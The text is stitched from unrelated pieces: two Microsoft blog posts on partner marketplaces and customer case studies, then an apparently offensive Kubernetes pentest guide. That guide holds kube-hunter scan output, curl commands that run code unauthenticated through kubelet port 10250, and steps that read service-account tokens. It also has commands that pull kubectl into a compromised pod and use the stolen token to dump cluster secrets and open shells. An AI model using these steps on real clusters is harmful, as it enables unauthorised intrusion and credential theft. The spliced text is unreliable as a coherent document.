Gartner estimates the opportunity for business applications will be $133 billion this year, with independent software vendors (ISVs) driving more than half of that. So we are upping our commitment to ISVs by investing in Microsoft’s marketplaces, Azure Marketplace, and AppSource, to build the largest commercial marketplace in the industry. Our marketplace provides a frictionless selling and buying experience that brings parity to first and third-party solutions and meets the needs of both IP builders and software purchasers. Partners with solutions in our marketplace can sell directly to more than a billion customers and partners, and they benefit from lower deployment costs and flexible procurement models for software. Through the marketplace go-to-market services, we’ve seen partners achieve an average of 40 percent reduction in cost per lead, and a 2x lead conversion to sales rate compared to industry averages.

New capabilities are coming soon to AppSource and Azure Marketplace. One of the biggest developments is the ability for partners to offer their solutions to our partner ecosystem through the CSP program, with a single click. We’re also improving the user experience and interface with natural language and recommendations features. And by setting up private marketplaces, partners will be able to customize the terms for any specific customer—billing or metering their services on a per-user, per-app, per-month, or per-day basis to meet customer needs. And soon we’ll be offering curated portfolio IP & Services solutions that leverage Azure, Dynamics, Power BI, Power Apps, and Office.

AI for enterprise

IDC estimates that global spending on cognitive and artificial intelligence systems is expected to triple between 2018 to 2022, from $24 billion to $77.6 billion. And just like Microsoft transformed the way people work and live by making personal computing widely accessible in the 1980s and 1990s, we plan to do the same with artificial intelligence. Our aim is to make AI accessible to and valuable for everyone. We’ll do it by focusing on AI innovations that extend and empower human capabilities, while keeping people in control. Our partners are finding huge success and growth in the AI space. Through our AI Inner Circle Partner program, partners provide custom services and enhanced AI solutions to customers and have seen more than 200 percent growth in their AI practices year-over-year.

As we encourage partners to go all-in on AI, we need to make sure they have substantial resources and training. So we’ve developed AI Practice Development Workshops and advanced education, with training in the classroom, online, and at events. Since July, more than 29,000 people have been trained across Microsoft’s data and AI portfolios. Our popular AI Partner Development Playbook and library of online resources—collectively with more than 1 million downloads—have put answers at the fingertips of partners launching and expanding their AI services.

New HR skills playbook and tools

The latest in our series of Cloud Practice Development Playbooks, released today, is an outstanding human resources guide for partners and customers. We collected input from more than 700 partners to develop “Recruit, Hire, Onboard & Retain Talent.” It is a hands-on guide to walk partners through the HR process of recruiting, hiring, and onboarding employees. Alongside the playbook, we’re launching a new learning portal on MPN that simplifies partner training, and a new Partner Transformation Assessment Tool to help partners map resources and investments against solution areas and workloads.

Partner opportunities ahead

Microsoft’s mission is to empower every person and every organization on the planet to achieve more. And we know that partners make more possible. As a customer-first, partner-led company, we start with the needs of our customers and work with our partners to deliver the best outcomes for each organization. We look forward to continued evolution in the Microsoft-partner relationship this year—with more innovation in AI, more co-selling opportunities, and more ways to connect partners to customers and to other partners through Azure Marketplace and AppSource. I invite you to learn more about how Microsoft leaders from the Azure, Dynamics, and ISV teams are supporting our partners, and how partners can capitalize on the opportunities ahead.

The post Inspired and powered by partners appeared first on The Official Microsoft Blog.

From shopping to car design, our customers and partners spark innovation across every industry

Judson Althoff visits Kroger’s QFC store in Redmond, WA, one of two pilot locations featuring connected customer experiences powered by Microsoft Azure and AI. Also pictured, Wesley Rhodes, Vice President of Technology Transformation at Kroger.

Computing is embedded all around us. Devices are increasingly more connected, and the availability of data and information is greater now than it has ever been. To grow, compete and respond to customer demands, all companies are becoming digital. In this new reality, enterprise technology choices play an outsized role in how businesses operate, influencing how employees collaborate, how organizations ensure data security and privacy, and how they deliver compelling customer experiences.

This is what we mean when we talk about digital transformation. As our CEO Satya Nadella described it recently, it is how organizations with tech intensity adopt faster, best-in-class technology and simultaneously build their own unique digital capabilities. I see this trend in every industry where customers are choosing Microsoft’s intelligent cloud and intelligent edge to power their transformation.

Over just the past two months, customers as varied as Walmart, Gap Inc., Nielsen, Mastercard, BP, BlackRock, Fruit of the Loom and Brooks Running have shared how technology is reshaping all aspects of our lives — from the way we shop to how we manage money and save for retirement. At the Consumer Electronics Show (CES) earlier this month, Microsoft customers and partners highlighted how the Microsoft cloud, the Internet of Things (IoT) and artificial intelligence (AI) play an ever-expanding role in driving consumer experiences, from LGE’s autonomous vehicle and infotainment systems, to Visteon’s use of Azure to develop autonomous driving development environments, to ZF’s fleet management and predictive maintenance solutions. More recently, at the National Retail Federation (NRF) conference, Microsoft teamed up with retail industry leaders like Starbucks that are reimagining customer and employee experiences with technology.

In fact, there is no shortage of customer examples of tech intensity. They span all industries, including retail, healthcare, automotive manufacturing, maritime research, education and government. Here are just a few of my favorite examples:

Together with Microsoft, Kroger – America’s biggest supermarket chain – opened two pilot stores offering new connected experiences with Microsoft Azure and AI and announced a Retail as a Service (RaaS) solution on Azure. This partnership with Kroger resonates strongly with me because I first met with the company’s CEO in 2013 soon after joining Microsoft. Since then, I have witnessed the Kroger-Microsoft relationship grow and mature beyond measure. The pilot stores feature “digital shelves” which can show ads and change prices on the fly, along with a network of sensors that keep track of products and help speed shoppers through the aisles. Kroger may eventually roll out the Microsoft cloud-powered system in all its 2,780 supermarkets.

In the healthcare industry, earlier this month, we announced a seven-year strategic cloud partnership with Walgreens Boots Alliance (WBA). Through the partnership, WBA will harness the power of Microsoft Azure cloud and AI technology, Microsoft 365, health industry investments and new retail solutions with WBA’s customer reach, convenient locations, outpatient health care services and industry expertise to make health care delivery more personal, affordable and accessible for people around the world.

Pharmacy staff member with patient

Walgreens Boots Alliance will harness the power of Microsoft Azure cloud and AI technology and Microsoft 365 to help improve health outcomes and lower overall costs.

Customers tell us that one of the biggest advantages of working with Microsoft is our partner ecosystem. That ecosystem has brought together BevMo!, a wine and liquor store, and Fellow Inc., a Microsoft partner. Today, BevMo! is using Fellow Robots to connect supply chain efficiency with customer delight. Powered by Power BI, Microsoft Azure and AI, the Fellow Robots use image recognition to pinpoint product locations and integrate point-of-sale interactions to offer customers different types of products. BevMo! is also using Microsoft’s intelligent cloud solutions to empower its store associates to deliver better customer service.

Fellow Robots product in a retail store

Fellow Robots from partner Fellow, Inc. are helping BevMo! connect supply chain efficiency and better customer service. The robots are powered by Microsoft Azure, AI and Machine Learning.

In automotive, companies like Toyota are breaking new ground in mixed reality. With its HoloLens solution, Toyota can now project existing 3D CAD data used in the vehicle design process directly onto the vehicle for measurements, optimizing existing processes and minimizing errors. In addition, Toyota is trialing Dynamics 365 Layout to improve machinery layout within its facilities and Dynamics 365 Remote Assist to provide workers with expert support from off-site designers and engineers. Also, Toyota has deployed Surface devices, enabling designers and engineers to fluidly connect in real time as part of a company-wide investment to accelerate innovation through collaboration.

A Toyota engineer uses Microsoft HoloLens to perform a process called “film coating thickness inspection” to manage the thickness of the paint for consistent coating quality on every vehicle.

Digital transformation is also changing the way we learn. For example, in the education space, the Law School Admission Council (LSAC), a non-profit organization devoted to law and education worldwide, announced its selection of the Windows platform on Surface Go devices to digitize the Law School Admission Test (LSAT) for more than 130,000 LSAT test takers each year. In addition to the Digital LSAT, Microsoft is working with LSAC on several initiatives to improve and expand access to legal education.

Surface Go device
One of the thousands of Microsoft Surface Go devices running Windows 10 and proprietary software to facilitate the modern and efficient Digital LSAT starting in July 2019.

Beyond manufacturing and retail, organizations are adopting the cloud and AI to reimagine environmental conservation. Fish may not be top of mind when thinking about innovation, but Australia’s Northern Territory is building its own technology to ensure the sustainable management of fisheries resources for future generations. For marine biologists, a seemingly straightforward task like counting fish becomes significantly more challenging or even dangerous when visibility in marine environments is low and when large predators (think: saltwater crocodiles) live in those environments. That is where AI comes in. Scientists use the technology to automatically identify and count fish photographed by underwater cameras. Over time, the AI solution becomes more accurate with each new fish analyzed. Greater availability of this technology may soon help other areas of the world improve their understanding of aquatic resources.

Shane Penny, Fisheries Research Scientist, and his team using baited underwater cameras as part of Australia’s Northern Territory Fisheries artificial intelligence project with Microsoft to fuel insights in marine science.

With almost 13,000 post offices and more than 134,000 employees, Poste Italiane is Italy’s largest distribution network. The organization delivers traditional mail and parcels but also operates at the digital frontier through innovation in financial and insurance services as well as mobile and digital payments solutions. Poste Italiane selected Dynamics 365 for its CRM, creating the largest online deployment in Italy. The firm sees the deployment as a critical part of its strategy to support growth, contain costs and deliver a better, richer customer experience.

Poste Italiane building
Poste Italiane’s selection of Microsoft is part of their digital transformation program that aims to reshape the retail sales approach and increase cross-selling revenues and profitability of its subsidiaries BancoPosta and PosteVita.

These examples only scratch the surface of how digital transformation and digital capabilities are bringing together people, data and processes in a way that generates value, competitive advantage and powers innovation across every industry. I am incredibly humbled that our customers and partners have chosen Microsoft to support their digital journey.

The post From shopping to car design, our customers and partners spark innovation across every industry appeared first on The Official Microsoft Blog.

Kubernetes: Kube-Hunter 10255

Below is some sample output, mainly here to show what an open 10255 will give you and what it looks like. Probably of most interest are the /pods endpoint, the /metrics endpoint, and the /stats endpoint.

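If a scan like the one below finds 10255 open, you can also query the read-only kubelet endpoints directly; here is a minimal sketch with Python's requests, where the target IP is a placeholder just as it is in the output:

import requests

HOST = "1.2.3.4"   # placeholder, as in the kube-hunter output below
BASE = f"http://{HOST}:10255"

# The read-only kubelet port answers without authentication.
pods = requests.get(f"{BASE}/pods", timeout=5).json()       # pod specs on the node
for item in pods.get("items", []):
    print(item["metadata"]["namespace"], item["metadata"]["name"])

metrics = requests.get(f"{BASE}/metrics", timeout=5).text   # can leak the k8s version
stats = requests.get(f"{BASE}/stats", timeout=5).text       # node/container stats
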
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

----------

Nodes
+-------------+---------------+
| TYPE        | LOCATION      |
+-------------+---------------+
| Node/Master | 1.2.3.4       |
+-------------+---------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+

Kubernetes: unauth kubelet API 10250 token theft & kubectl



kube-hunter output (flagging the open kubelet API on 10250) gets us started.

Do a curl -sk https://k8-node:10250/runningpods/ to get a list of running pods.

With that data, you can craft your POST request to exec within a pod so we can poke around.

Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kubelet tokens are in the environment variables. Depending on the cloud provider or hosting provider, they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBELET_CERT, KUBELET_KEY, & CA_CERT environment variables.


We are also looking for the Kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:

KUBERNETES_PORT=tcp://10.10.10.10:443

or

KUBERNETES_MASTER_NAME: 10.11.12.13:443

Once we get the Kubernetes tokens or keys, we need to talk to the API server to use them; the kubelet (10250) won't know what to do with them. The API server may be (if we are lucky) another public IP or a 10.x.x.x internal IP. If it's a 10.x.x.x IP, we need to download kubectl to the pod.
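If it comes to that, here's a sketch of pulling kubectl down via the same /run primitive (this assumes the container has wget and outbound access; the version and arch in the URL are placeholders to adjust for your target):

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=wget https://storage.googleapis.com/kubernetes-release/release/v1.13.1/bin/linux/amd64/kubectl -O /tmp/kubectl"
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=chmod +x /tmp/kubectl"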

Assuming they're not in the environment variables, let's look and see if they are in the mounted secrets:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

Sample output (truncated):
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.crt, namespace, and token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

Output:

eyJhbGciOiJSUzI1NiI---SNIP---

Also grab the ca.crt :-)
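It follows the same pattern as the token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"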

With the token, ca.crt, and API server IP address we can issue commands with kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

At this point you can pull secrets or exec into any available pods:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get secrets --all-namespaces

To get a shell via kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
--SNIP--
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness, if you got the keys via the environment variables, the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kubelet.key --client-certificate=kubelet.crt get pods --all-namespaces


Kubernetes: unauth kubelet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port, but it's still possible to expose it inadvertently, and it's still pretty common to find it exposed via the "insecure API service" option.


Anyone who has access to the kubelet port (10250), even without a certificate, can execute any command inside the container.

# /run/%namespace%/%pod_name%/%container_name%

example:

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var


Here is how to get all the secrets a container uses (environment variables; it's common to see kubelet tokens here):

$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system//" -d "cmd=env"

The list of all pods and containers that were scheduled on the Kubernetes worker node can be retrieved using one of the commands below:

$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool

or

$ curl --insecure  https://k8s-node-1:10250/runningpods | jq


Example 1:

curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)

Example 2:
curl --insecure  https://1.2.3.4:10250/runningpods | jq

Output:

Unauthorized

Example 3:

curl --insecure  https://1.2.3.4:10250/runningpods | jq


Output:

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
        --------SNIP---------

With the output of the runningpods command you can craft your command to do the code exec:

$ curl -k -XPOST "https://k8s-node-1:10250/run///" -d "cmd=env"

As an example, filling in the namespace, pod name, and container name from the runningpods output above leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"

total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx------    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Kubernetes: List of ports

Other Kubernetes ports


What are some of the visible ports used in Kubernetes? (A quick port-scan sketch to check for them follows the list.)

  • 44134/tcp - Helm Tiller, weave, calico
  • 10250/tcp - kubelet (the kubelet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp - kubelet port (read-only)
    • /stats
